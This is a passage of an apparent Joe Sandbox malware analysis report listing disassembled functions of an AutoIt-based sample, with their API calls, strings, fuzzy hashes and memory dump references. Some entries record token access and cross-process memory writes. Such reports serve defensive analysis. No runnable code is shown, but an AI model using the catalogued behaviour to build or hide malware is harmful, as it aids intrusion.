Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 3580e965003ab446065b7ef167b460431f527bf7f3875b7da17d8d16be8e07b8
Instruction ID: 34fc3cb15e9eb69f3e9c1117025b1b61c89cfc137b0f6cc49ef3e91e2e10b0e1
Opcode Fuzzy Hash: 3580e965003ab446065b7ef167b460431f527bf7f3875b7da17d8d16be8e07b8
Instruction Fuzzy Hash: 9BE0A535546228BAEB215BA2DC0DFDB7E5CFF177A1F408029B91995060C671C5819BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BC2231
SetTextColor.GDI32(?,000000FF), ref: 00BC223B
SetBkMode.GDI32(?,00000001), ref: 00BC2250
GetStockObject.GDI32(00000005), ref: 00BC2258
GetWindowDC.USER32(?,00000000), ref: 00BFC0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 00BFC0E0
GetPixel.GDI32(00000000,?,00000000), ref: 00BFC0F9
GetPixel.GDI32(00000000,00000000,?), ref: 00BFC112
GetPixel.GDI32(00000000,?,?), ref: 00BFC132
ReleaseDC.USER32(?,00000000), ref: 00BFC13D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 6a4c2e1d9c0ffed7370d5ba974b02a583cc14a4162d1eabe3285fb5fbf99b168
Instruction ID: 53882331c43103e76d8159ec25e10ccb3bded3c6694a51739f997931c7b519d1
Opcode Fuzzy Hash: 6a4c2e1d9c0ffed7370d5ba974b02a583cc14a4162d1eabe3285fb5fbf99b168
Instruction Fuzzy Hash: 92E03036500148EADB215F64EC097DC3B50EB06332F0083AAFA69580E187714995DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00C18C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00C18C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,00C1882E), ref: 00C18C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C1882E), ref: 00C18C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,00C1882E), ref: 00C18C7E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 250e0a95186b2706492128a965846c72506f7bec74c4b454f8471628a5ea71ee
Instruction ID: 3bcd7d7e8a5805fab93b9d8f4b14f00a057b7f33c7768fbe7a5164dd40b4b65e
Opcode Fuzzy Hash: 250e0a95186b2706492128a965846c72506f7bec74c4b454f8471628a5ea71ee
Instruction Fuzzy Hash: 04E0863A646211DBD7205FB46D0CB9F3BACFF53792F04482CB245C9050DA748486DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C02187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C02187
GetDC.USER32(00000000), ref: 00C02191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C021B1
ReleaseDC.USER32(?), ref: 00C021D2

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: c8136692397fe8c1a384d5083226226b9f58b3977381949b52ffef5023832998
Instruction ID: 6858e11c54e3bfad77fb6be13f2225034b32f3c8516863399b557a7420114aa7
Opcode Fuzzy Hash: c8136692397fe8c1a384d5083226226b9f58b3977381949b52ffef5023832998
Instruction Fuzzy Hash: FAE0E579800604EFDB01AF61D808B9E7BF1FB5D351F128429FD5A97260CB3885429F40

Uniqueness

Uniqueness Score: -1.00%

Function 00C0219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00C0219B
GetDC.USER32(00000000), ref: 00C021A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C021B1
ReleaseDC.USER32(?), ref: 00C021D2

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ef16eeae0c1fb8eaa93620762344596f0a470f98da7dc35d0a90bc2e8d908bb8
Instruction ID: 0766bedd1afd82b2390dcd09df42bbc5cf0090bef1c6346e465499f57234c498
Opcode Fuzzy Hash: ef16eeae0c1fb8eaa93620762344596f0a470f98da7dc35d0a90bc2e8d908bb8
Instruction Fuzzy Hash: 7EE0EEB9800204AFCB01AFA0C808B9E7BE1FB5D311F128029F95AA7220CB3895429F40

Uniqueness

Uniqueness Score: -1.00%

Function 00C1B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00C1B981

Strings

Container, xrefs: 00C1B8FE
AutoIt3GUI, xrefs: 00C1B8F9

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 50e6a8a1d8516fceec75fa41d7b7fafe859b4980570e8c53f2182c1f5917785b
Instruction ID: 6091604179a8c6b71b54b2a1fda8ed9c9b5a6114efb52e7e30bc1a77314e2ac9
Opcode Fuzzy Hash: 50e6a8a1d8516fceec75fa41d7b7fafe859b4980570e8c53f2182c1f5917785b
Instruction Fuzzy Hash: 509137746006019FDB24DF28C885AAABBF9FF4A710F14856DF94A8B291DB70ED81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00C2B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00BDFEC6: _wcscpy.LIBCMT ref: 00BDFEE9

Part of subcall function 00BC9997: __itow.LIBCMT ref: 00BC99C2
Part of subcall function 00BC9997: __swprintf.LIBCMT ref: 00BC9A0C

__wcsnicmp.LIBCMT ref: 00C2B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00C2B361

Strings

LPT, xrefs: 00C2B292

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 2bf0b32b17324e4317827afb9596a801656e2a9e05c574c6607d9814e38a6968
Instruction ID: 83ac37ab0a3b1a0e2d8e79c482981269ecd69fbb4d276b0ea6191ff6014cd2ad
Opcode Fuzzy Hash: 2bf0b32b17324e4317827afb9596a801656e2a9e05c574c6607d9814e38a6968
Instruction Fuzzy Hash: 65619175A00225EFDB14DF94D885EAEB7F4EF08710F1140AAF956AB7A1DB70AE40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BD2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00BD2AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00BD2AE1

Strings

@, xrefs: 00BD2AD5

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: d2095c0722a440f7ee237a6eb12cdc20548c4c6bdd096809db9b40b38695e916
Instruction ID: 0be7e6a97b459ceb01e07ff245d3be8fe38df8369790747e03501f33c01a6e0f
Opcode Fuzzy Hash: d2095c0722a440f7ee237a6eb12cdc20548c4c6bdd096809db9b40b38695e916
Instruction Fuzzy Hash: 51514671418B44DBE320AF11D88AFAFBBE8FF84310F42889DF1D9511A1DB708529CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00C299BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00BC506B: __fread_nolock.LIBCMT ref: 00BC5089

_wcscmp.LIBCMT ref: 00C29AAE
_wcscmp.LIBCMT ref: 00C29AC1

Strings

FILE, xrefs: 00C299FA

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: ccf03074f61d03879a6f11e1ab4196bbeaf53f77f57bf7509a3f44faf445fdf1
Instruction ID: 4c09a06a02fa7f3cae10638a4bcd0c334243a7d40eb7e4df7bca51c3a2be6b8d
Opcode Fuzzy Hash: ccf03074f61d03879a6f11e1ab4196bbeaf53f77f57bf7509a3f44faf445fdf1
Instruction Fuzzy Hash: 9A41D271A00619BBDF20AAA4DC86FEFBBF9DF45710F0000B9B904E7181DA75AA4487A1

Uniqueness

Uniqueness Score: -1.00%

Function 00C32882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C32892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C328C8

Strings

|, xrefs: 00C32899

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: dd60dcb79e57683b0e27dd9974db2e21a9ec31f9ebfc8aa5698667ce29615db5
Instruction ID: 6a9aca9a8aec765bb74284c82bc53bfb29fc28f459fda01ab1752c64dca02b90
Opcode Fuzzy Hash: dd60dcb79e57683b0e27dd9974db2e21a9ec31f9ebfc8aa5698667ce29615db5
Instruction Fuzzy Hash: 58315A71900219AFCF01EFA2CC85EEEBFB9FF08310F100169F914A6166DB315A56DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C46CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00C46D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00C46DC2

Strings

static, xrefs: 00C46D22

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 8baeaa49fb6ab293a038761f044e562adcd4fc2521914b9f2def0bc96e549c52
Instruction ID: b9f4cdd799a68630805c55540109a8fe2a3b7af39fa1fc2a2abd12aacded3054
Opcode Fuzzy Hash: 8baeaa49fb6ab293a038761f044e562adcd4fc2521914b9f2def0bc96e549c52
Instruction Fuzzy Hash: F8319E71600604AEEB109F28CC80FFB77B8FF49724F10862DF9A597190CA31AC91DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C22D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C22E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C22E3B

Strings

0, xrefs: 00C22DF9

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 8d6d6b2c462081a7fcc129a5b3d69d0831e00b4da1af0acbf41214a881f97cd3
Instruction ID: 9e56d9b0fb64c552922b80b86aabb9e117bc1c95490ce761f10e3b3b13bcfe42
Opcode Fuzzy Hash: 8d6d6b2c462081a7fcc129a5b3d69d0831e00b4da1af0acbf41214a881f97cd3
Instruction Fuzzy Hash: 93310631600325BBEB24CF49E885BEEBBF9FF05301F150069E995975A1D7709B40EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C1AFDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00BD61B1

SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C1B03B
_strlen.LIBCMT ref: 00C1B046

Strings

@U=u, xrefs: 00C1B03B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend$Timeout_strlen
String ID: @U=u
API String ID: 2777139624-2594219639
Opcode ID: 68e50472ac21b9bf490386b8a2041173a11e01cef6f46ed2cba1c369a02e3415
Instruction ID: 3444da88ef93305ef3d5d9d9a786ce826a0e7de29e463534b889209fa63b17dd
Opcode Fuzzy Hash: 68e50472ac21b9bf490386b8a2041173a11e01cef6f46ed2cba1c369a02e3415
Instruction Fuzzy Hash: F91108B260020566CB14AA79DCC2AFF77A99F4E300F00007EF51A96193DF258DC5AA50

Uniqueness

Uniqueness Score: -1.00%

Function 00C46AD4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2589F: GetLocalTime.KERNEL32 ref: 00C258AC
Part of subcall function 00C2589F: _wcsncpy.LIBCMT ref: 00C258E1
Part of subcall function 00C2589F: _wcsncpy.LIBCMT ref: 00C25913
Part of subcall function 00C2589F: _wcsncpy.LIBCMT ref: 00C25946
Part of subcall function 00C2589F: _wcsncpy.LIBCMT ref: 00C25988

SendMessageW.USER32(?,00001002,00000000,?), ref: 00C46B6E

Strings

SysDateTimePick32, xrefs: 00C46B2C
@U=u, xrefs: 00C46B6E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _wcsncpy$LocalMessageSendTime
String ID: @U=u$SysDateTimePick32
API String ID: 2466184910-2530228043
Opcode ID: 9b2d0c671a93dfd8432e4aaa6366b3b340a98283a1b83a8066a19a14bd6b258c
Instruction ID: 7bd071ba98aead7493db7009adb4debf6900333e1bb88c357cbf3aacc1cdaa7c
Opcode Fuzzy Hash: 9b2d0c671a93dfd8432e4aaa6366b3b340a98283a1b83a8066a19a14bd6b258c
Instruction Fuzzy Hash: C82126323402087FEF219E24CC82FEE73A9FB45764F104529F954EB2D4D6B1AC80A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C19707 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C19720

Part of subcall function 00C218EE: GetWindowThreadProcessId.USER32(?,?), ref: 00C21919
Part of subcall function 00C218EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C1973C,00000034,?,?,00001004,00000000,00000000), ref: 00C21929
Part of subcall function 00C218EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C1973C,00000034,?,?,00001004,00000000,00000000), ref: 00C2193F

Part of subcall function 00C219CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C19778,?,?,00000034,00000800,?,00000034), ref: 00C219F6

SendMessageW.USER32(?,00001073,00000000,?), ref: 00C19787

Part of subcall function 00C21997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C197A7,?,?,00000800,?,00001073,00000000,?,?), ref: 00C219C1

Strings

@U=u, xrefs: 00C19720, 00C19787

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Process$MemoryMessageSend$AllocOpenReadThreadVirtualWindowWrite
String ID: @U=u
API String ID: 1045663743-2594219639
Opcode ID: 04eec441b9d2ee4517608d34fcdd9ffa9fa0bc36536844d6bab0d62ca20283c5
Instruction ID: 872c9640df4e4284dd5ae9799c33d95cdc7a92f045c2003083b8689588a09619
Opcode Fuzzy Hash: 04eec441b9d2ee4517608d34fcdd9ffa9fa0bc36536844d6bab0d62ca20283c5
Instruction Fuzzy Hash: 4F215131901129ABDF11AFA4DC41FDDBBB4FF09350F1101A5F958A7190EA705A84DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C46943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C469D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C469DB

Strings

Combobox, xrefs: 00C4699D

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 52ade8a3877a6fa9d82dd0b367270a615590061148c1d4f288ed21efa2c0491e
Instruction ID: e844dc7de3c49f750bcfcdd876172a6b5d94c3098f85f3aed2dfa595134e29ca
Opcode Fuzzy Hash: 52ade8a3877a6fa9d82dd0b367270a615590061148c1d4f288ed21efa2c0491e
Instruction Fuzzy Hash: B011B671610208AFEF159E24CC80FBF376AFBAA3A4F114125F96897294D6B19D5187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C49962 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

@U=u, xrefs: 00C499E7, 00C49A10

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: 05f3e0872fbdae5bfaf61ec2788b458a3dc52ce630ac4fb63b2758ee2b0fbf8e
Instruction ID: cae8c611b89fbe3114f8f2e5d1401d93894046c2e4e1375ea5d5263da4715905
Opcode Fuzzy Hash: 05f3e0872fbdae5bfaf61ec2788b458a3dc52ce630ac4fb63b2758ee2b0fbf8e
Instruction Fuzzy Hash: 4B219A35244228BFEB109F658C42FBB37A4FB09350F044159FA2AEA1E1C670EE10AB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C46E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00BC1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BC1D73
Part of subcall function 00BC1D35: GetStockObject.GDI32(00000011), ref: 00BC1D87
Part of subcall function 00BC1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC1D91

GetWindowRect.USER32(00000000,?), ref: 00C46EE0
GetSysColor.USER32(00000012), ref: 00C46EFA

Strings

static, xrefs: 00C46EBD

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

